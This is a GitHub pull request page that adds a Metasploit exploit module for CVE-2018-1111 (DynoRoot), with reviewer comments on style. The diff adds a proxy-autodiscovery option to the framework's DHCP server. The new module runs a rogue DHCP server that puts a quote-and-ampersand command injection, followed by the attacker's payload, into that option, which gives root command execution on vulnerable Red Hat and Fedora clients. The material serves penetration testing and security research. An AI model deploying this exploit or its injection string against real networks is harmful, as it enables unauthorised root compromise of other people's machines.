Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2018-1111 exploit #10059

Merged
merged 14 commits into from
Jun 12, 2018
Merged

Add CVE-2018-1111 exploit #10059

Show file tree
Hide file tree
Changes from 12 commits
Commits
Show all changes
14 commits
Select commit Hold shift + click to select a range
164f3ef
Add CVE-2018-1111 exploit
kkirsche May 18, 2018
f1b9088
Fix msf/core include requirement
kkirsche May 18, 2018
8f02423
Fix style to use curly braces instead of pipes
kkirsche May 18, 2018
35ee1b5
Use https instead of http in the comments
kkirsche May 18, 2018
0951aca
Fix require that’s included by mixin
kkirsche May 18, 2018
599979b
Add AKA and remove filename
kkirsche May 18, 2018
1efa5c4
Move to PayloadType instead of Compat
kkirsche May 18, 2018
6d0c6a7
Randomize the starting letter
kkirsche May 18, 2018
b0f5566
Change rand text length and remove disable nops
kkirsche May 19, 2018
4bf259e
Add github and EDB ID number
kkirsche May 19, 2018
d9d2263
Fix missing comma
kkirsche May 19, 2018
f2549a1
Make domain name conditional
kkirsche May 19, 2018
c665a32
Add privileged and fix PayloadType hash style
kkirsche May 19, 2018
93e9c96
Adjust link / name ordering to be alphabetical by key (not sorted by …
kkirsche May 21, 2018
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions lib/rex/proto/dhcp/constants.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,7 @@ module DHCP
OpDns = 6
OpHostname = 0x0c
OpURL = 0x72
OpProxyAutodiscovery = 0xfc
OpEnd = 0xff

PXEMagic = "\xF1\x00\x74\x7E"
Expand Down
7 changes: 4 additions & 3 deletions lib/rex/proto/dhcp/server.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -128,7 +128,7 @@ def stop
def set_option(opts)
allowed_options = [
:serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
:pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
:pxeconfigfile, :pxepathprefix, :pxereboottime, :router, :proxy_auto_discovery,
:give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
]

Expand All @@ -154,7 +154,7 @@ def send_packet(ip, pkt)
end

attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
attr_accessor :domain_name
attr_accessor :domain_name, :proxy_auto_discovery
attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
Expand Down Expand Up @@ -292,12 +292,13 @@ def dispatch_request(from, buf)
end

# Options!
pkt << dhcpoption(OpProxyAutodiscovery, self.proxy_auto_discovery) if self.proxy_auto_discovery
pkt << dhcpoption(OpDHCPServer, self.ipstring)
pkt << dhcpoption(OpLeaseTime, [self.leasetime].pack('N'))
pkt << dhcpoption(OpSubnetMask, self.netmaskn)
pkt << dhcpoption(OpRouter, self.router)
pkt << dhcpoption(OpDns, self.dnsserv)
pkt << dhcpoption(OpDomainName, self.domain_name)
pkt << dhcpoption(OpDomainName, self.domain_name) if self.domain_name

if self.servePXE # PXE options
pkt << dhcpoption(OpPXEMagic, PXEMagic)
Expand Down
67 changes: 67 additions & 0 deletions modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::DHCPServer

def initialize(info = {})
super(update_info(info,
'Name' => 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm', # Vulnerability discovery
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can add a 'Privileged' => true, key to this hash somewhere, to show off that your exploit gives remote r00t.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed

'References' =>
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Feel free to include your own PoC in this array. :)

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'd add an AKA reference for DynoRoot, too.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Added

[
['CVE', '2018-1111'],
['EDB': '44652'],
['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
['AKA', 'DynoRoot'],
['URL', 'https://dynoroot.ninja/'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'PayloadType': 'cmd',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should be a hash rocket for consistency

'PayloadType' => 'cmd',

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed

'Targets' => [ [ 'Automatic Target', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2018'
))

deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
end

def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")

begin
while @dhcp.thread.alive?
sleep 2
end
ensure
stop_service
end
end
end